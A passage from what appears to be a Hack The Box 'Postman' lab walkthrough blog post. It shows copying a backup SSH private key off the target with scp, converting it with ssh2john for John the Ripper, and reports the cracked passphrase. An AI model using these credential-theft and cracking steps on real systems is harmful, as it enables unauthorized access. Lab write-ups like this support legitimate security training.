1n4r1/1n4r1.github.io/_posts/2020-03-16-Hackthebox-Postman-Walkthrough.md

 redis@Postman:~$
 {% endhighlight %}

+Try to download with scp.
 {% highlight shell %}
 root@kali:~# scp redis@10.10.10.160:/opt/id_rsa.bak /root
 id_rsa.bak                                                        100% 1743    38.3KB/s   00:00
 root@kali:~#
 {% endhighlight %}

+Kali Linux can brute-force the password with the John the Ripper.<br>
+However, we need to change the SSH private key into the hash which format is readable by John the Ripper.<br>
+By cracking with "rockyou.txt", we can achieve a password "computer2008" for someone.
 {% highlight shell %}
 root@kali:~# /usr/share/john/ssh2john.py id_rsa.bak > hash.txt